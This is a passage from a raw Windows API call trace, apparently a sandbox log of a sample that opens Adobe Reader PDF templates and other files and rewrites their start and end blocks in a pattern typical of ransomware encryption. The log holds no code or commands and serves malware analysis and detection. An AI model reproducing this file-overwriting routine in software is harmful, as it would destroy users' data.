lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x16cbc [0061.920] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0061.920] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0061.920] ReleaseMutex (hMutex=0x168) returned 1 [0061.920] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="_D3G3fnlKg.ods", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0061.921] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="_D3G3fnlKg.ods", cchWideChar=14, lpMultiByteStr=0x1f7346c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="_D3G3fnlKg.ods", lpUsedDefaultChar=0x0) returned 14 [0061.921] ReadFile (in: hFile=0x1cc, lpBuffer=0x1e980a8, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x1e980a8*, lpNumberOfBytesRead=0x311f278*=0x4000, lpOverlapped=0x0) returned 1 [0061.922] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x15cbc [0061.922] ReadFile (in: hFile=0x1cc, lpBuffer=0x26b4468, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x26b4468*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0061.922] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x15cbc [0061.922] WriteFile (in: hFile=0x1cc, lpBuffer=0x26b4468*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x26b4468*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0061.923] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0061.923] WriteFile (in: hFile=0x1cc, lpBuffer=0x1e980a8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e980a8*, lpNumberOfBytesWritten=0x311f28c*=0x4000, lpOverlapped=0x0) returned 1 [0061.923] CloseHandle (hObject=0x1cc) returned 1 [0061.926] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\CHT\\AdobeID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\cht\\adobeid.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0061.926] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0061.926] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x561b [0061.927] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0061.927] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0061.927] ReleaseMutex (hMutex=0x168) returned 1 [0061.927] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdobeID.pdf", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0061.927] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdobeID.pdf", cchWideChar=11, lpMultiByteStr=0x1f7356c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdobeID.pdf", lpUsedDefaultChar=0x0) returned 11 [0061.927] ReadFile (in: hFile=0x1cc, lpBuffer=0x26b4468, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x26b4468*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0061.930] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x461b [0061.931] ReadFile (in: hFile=0x1cc, lpBuffer=0x26b4468, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x26b4468*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0061.931] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x461b [0061.931] WriteFile (in: hFile=0x1cc, lpBuffer=0x26b4468*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x26b4468*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0061.931] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0061.931] WriteFile (in: hFile=0x1cc, lpBuffer=0x26b4468*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x26b4468*, lpNumberOfBytesWritten=0x311f28c*=0x1000, lpOverlapped=0x0) returned 1 [0061.931] CloseHandle (hObject=0x1cc) returned 1 [0061.933] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\ENU\\AdobeID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\enu\\adobeid.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0061.933] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0061.933] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x14096 [0061.933] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0061.933] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0061.933] ReleaseMutex (hMutex=0x168) returned 1 [0061.933] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdobeID.pdf", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0061.933] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdobeID.pdf", cchWideChar=11, lpMultiByteStr=0x1f7346c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdobeID.pdf", lpUsedDefaultChar=0x0) returned 11 [0061.934] ReadFile (in: hFile=0x1cc, lpBuffer=0x1e980a8, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x1e980a8*, lpNumberOfBytesRead=0x311f278*=0x4000, lpOverlapped=0x0) returned 1 [0061.936] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x13096 [0061.936] ReadFile (in: hFile=0x1cc, lpBuffer=0x26b4468, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x26b4468*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0061.939] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x13096 [0061.939] WriteFile (in: hFile=0x1cc, lpBuffer=0x26b4468*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x26b4468*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0061.939] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0061.940] WriteFile (in: hFile=0x1cc, lpBuffer=0x1e980a8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e980a8*, lpNumberOfBytesWritten=0x311f28c*=0x4000, lpOverlapped=0x0) returned 1 [0061.940] CloseHandle (hObject=0x1cc) returned 1 [0061.942] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\HUN\\AdobeID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\hun\\adobeid.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0061.943] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0061.943] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x16097 [0061.943] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0061.943] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0061.944] ReleaseMutex (hMutex=0x168) returned 1 [0061.944] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdobeID.pdf", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0061.944] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdobeID.pdf", cchWideChar=11, lpMultiByteStr=0x1f7356c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdobeID.pdf", lpUsedDefaultChar=0x0) returned 11 [0061.944] ReadFile (in: hFile=0x1cc, lpBuffer=0x1e980a8, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x1e980a8*, lpNumberOfBytesRead=0x311f278*=0x4000, lpOverlapped=0x0) returned 1 [0061.946] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x15097 [0061.946] ReadFile (in: hFile=0x1cc, lpBuffer=0x26b4468, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x26b4468*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0061.947] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x15097 [0061.948] WriteFile (in: hFile=0x1cc, lpBuffer=0x26b4468*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x26b4468*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0061.948] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0061.948] WriteFile (in: hFile=0x1cc, lpBuffer=0x1e980a8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e980a8*, lpNumberOfBytesWritten=0x311f28c*=0x4000, lpOverlapped=0x0) returned 1 [0061.948] CloseHandle (hObject=0x1cc) returned 1 [0061.950] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\NLD\\AdobeID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\nld\\adobeid.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0061.951] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0061.951] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x10929 [0061.951] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0061.951] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0061.952] ReleaseMutex (hMutex=0x168) returned 1 [0061.952] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdobeID.pdf", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0061.952] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdobeID.pdf", cchWideChar=11, lpMultiByteStr=0x1f7346c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdobeID.pdf", lpUsedDefaultChar=0x0) returned 11 [0061.952] ReadFile (in: hFile=0x1cc, lpBuffer=0x1e980a8, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x1e980a8*, lpNumberOfBytesRead=0x311f278*=0x4000, lpOverlapped=0x0) returned 1 [0061.954] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0xf929 [0061.955] ReadFile (in: hFile=0x1cc, lpBuffer=0x26b4468, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x26b4468*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0061.956] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0xf929 [0061.956] WriteFile (in: hFile=0x1cc, lpBuffer=0x26b4468*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x26b4468*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0061.956] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0061.956] WriteFile (in: hFile=0x1cc, lpBuffer=0x1e980a8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e980a8*, lpNumberOfBytesWritten=0x311f28c*=0x4000, lpOverlapped=0x0) returned 1 [0061.957] CloseHandle (hObject=0x1cc) returned 1 [0061.958] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\RUM\\AdobeID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\rum\\adobeid.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0061.959] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0061.959] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x5891 [0061.959] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0061.960] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0061.960] ReleaseMutex (hMutex=0x168) returned 1 [0061.960] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdobeID.pdf", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0061.960] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdobeID.pdf", cchWideChar=11, lpMultiByteStr=0x1f7356c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdobeID.pdf", lpUsedDefaultChar=0x0) returned 11 [0061.960] ReadFile (in: hFile=0x1cc, lpBuffer=0x26b4468, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x26b4468*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0061.962] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x4891 [0061.962] ReadFile (in: hFile=0x1cc, lpBuffer=0x26b4468, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x26b4468*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0061.963] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x4891 [0061.963] WriteFile (in: hFile=0x1cc, lpBuffer=0x26b4468*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x26b4468*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0061.964] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0061.964] WriteFile (in: hFile=0x1cc, lpBuffer=0x26b4468*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x26b4468*, lpNumberOfBytesWritten=0x311f28c*=0x1000, lpOverlapped=0x0) returned 1 [0061.964] CloseHandle (hObject=0x1cc) returned 1 [0061.965] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\SUO\\AdobeID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\suo\\adobeid.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0061.966] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0061.966] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x107e2 [0061.966] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0061.966] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0061.967] ReleaseMutex (hMutex=0x168) returned 1 [0061.967] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdobeID.pdf", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0061.967] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdobeID.pdf", cchWideChar=11, lpMultiByteStr=0x1f7346c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdobeID.pdf", lpUsedDefaultChar=0x0) returned 11 [0061.967] ReadFile (in: hFile=0x1cc, lpBuffer=0x1e980a8, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x1e980a8*, lpNumberOfBytesRead=0x311f278*=0x4000, lpOverlapped=0x0) returned 1 [0061.970] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0xf7e2 [0061.970] ReadFile (in: hFile=0x1cc, lpBuffer=0x26b4468, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x26b4468*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0061.971] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0xf7e2 [0061.971] WriteFile (in: hFile=0x1cc, lpBuffer=0x26b4468*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x26b4468*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0061.971] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0061.971] WriteFile (in: hFile=0x1cc, lpBuffer=0x1e980a8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e980a8*, lpNumberOfBytesWritten=0x311f28c*=0x4000, lpOverlapped=0x0) returned 1 [0061.972] CloseHandle (hObject=0x1cc) returned 1 [0061.973] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\PDFSigQFormalRep.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\pdfsigqformalrep.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0061.977] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0061.977] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x724ee [0061.978] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0061.978] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0061.978] ReleaseMutex (hMutex=0x168) returned 1 [0061.978] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDFSigQFormalRep.pdf", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0061.978] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDFSigQFormalRep.pdf", cchWideChar=20, lpMultiByteStr=0x1f8867c, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDFSigQFormalRep.pdf", lpUsedDefaultChar=0x0) returned 20 [0061.978] ReadFile (in: hFile=0x1cc, lpBuffer=0x2691bb8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2691bb8*, lpNumberOfBytesRead=0x311f278*=0x8000, lpOverlapped=0x0) returned 1 [0062.161] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x714ee [0062.161] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ec5568, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x1ec5568*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0062.168] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x714ee [0062.168] WriteFile (in: hFile=0x1cc, lpBuffer=0x26b4468*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x26b4468*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0062.168] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0062.168] WriteFile (in: hFile=0x1cc, lpBuffer=0x2662a08*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2662a08*, 